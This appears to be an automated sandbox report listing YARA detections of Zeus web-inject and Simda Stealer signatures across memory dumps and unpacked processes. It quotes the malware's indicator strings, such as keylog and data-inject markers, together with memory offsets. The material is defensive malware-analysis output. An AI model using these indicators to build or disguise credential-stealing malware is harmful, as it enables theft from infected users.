Process Memory Space: NcYLgtXIKJgHj.exe PID: 6008	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x1b023:$a1: name=%s&port=%u 0x21c6b:$a1: name=%s&port=%u 0x19fe1:$a2: data_inject 0x20c29:$a2: data_inject 0x1a52e:$a3: keylog.txt 0x21176:$a3: keylog.txt 0x19eb0:$a4: User-agent: %s]]] 0x20af8:$a4: User-agent: %s]]] 0x1b127:$a5: %s\%02d.bmp 0x21d6f:$a5: %s\%02d.bmp
Click to see the 118 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.3.svchost.exe.2d30000.45.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.ed00000.12.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.62.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
25.2.NcYLgtXIKJgHj.exe.2f50000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.70.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
0.3.Bpfz752pYZ.exe.6f8dc8.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.43.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.35.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.51.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
25.2.NcYLgtXIKJgHj.exe.2b92000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.26.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.32.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.26.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.10.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
22.2.NcYLgtXIKJgHj.exe.5e2000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.37.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.73.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.19.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.38.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.72.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.28.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.13.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.ed00000.12.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
25.2.NcYLgtXIKJgHj.exe.2b92000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.8.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0.3.Bpfz752pYZ.exe.6f81c8.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x463f4:$a1: name=%s&port=%u 0x45bc8:$a2: data_inject 0x45d7c:$a3: keylog.txt 0x45a5d:$a4: User-agent: %s]]] 0x46544:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.34.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.10.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.54.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.40.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.ee00000.74.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.69.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
31.2.NcYLgtXIKJgHj.exe.2792000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.41.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.29.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.57.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
10.2.NcYLgtXIKJgHj.exe.1520000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.56.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.28.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
7.2.NcYLgtXIKJgHj.exe.2fa2000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.70.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
14.2.NcYLgtXIKJgHj.exe.2ac0000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.21.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.14.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
7.2.NcYLgtXIKJgHj.exe.3100000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.61.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.29.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.50.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.31.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.46.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.73.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.67.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.11.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.23.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.63.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.29f3c00.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.22.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.64.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.39.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
6.2.NcYLgtXIKJgHj.exe.1740000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
16.2.NcYLgtXIKJgHj.exe.2792000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
36.2.NcYLgtXIKJgHj.exe.2202000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.34.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.67.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
20.2.NcYLgtXIKJgHj.exe.2652000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.41.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.56.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.21.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.24.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.40.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.35.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.886c00.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.5450000.15.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.400000.0.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.47.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.2.svchost.exe.2cd1c00.4.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.16.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.36.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.71.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
